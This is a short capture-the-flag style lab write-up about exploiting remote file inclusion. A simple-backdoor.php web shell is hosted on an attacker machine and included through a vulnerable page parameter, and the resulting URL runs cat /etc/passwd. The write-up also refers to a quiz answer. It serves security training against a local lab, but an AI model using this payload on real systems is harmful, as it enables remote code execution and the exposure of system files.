Web Shell with Remote File Inclusion (RFI)

Lab 22: Insecure Direct Object Reference - Web Shell with Remote File Inclusion (RFI)

Go to lab page: https://127.0.0.1/index.php?page=labs/lab-22.php

The idea is to upload via RFI a web shell to execute directly on the website vulnerable. In this case, i decided to utilize 'simple-backdoor.php'.

On the attacker machine (10.0.2.15) we can run a python web server using:

python3 -m http.server 1339

and reach it concatenating to IP:PORT file_name and & cmd=command as below:

https://127.0.0.1/index.php?page=http://10.0.2.15:1339/simple-backdoor.php&cmd=cat+/etc/passwd

The correct answer is the last of the list: The plus symbol is the encoded character representing a space ' '. We have to encode the space character to prevent Apache web server from thinking the space marks the end of the URL.

PreviousExtracting User Accounts with Local File Inclusion NextXSS

Last updated 1 month ago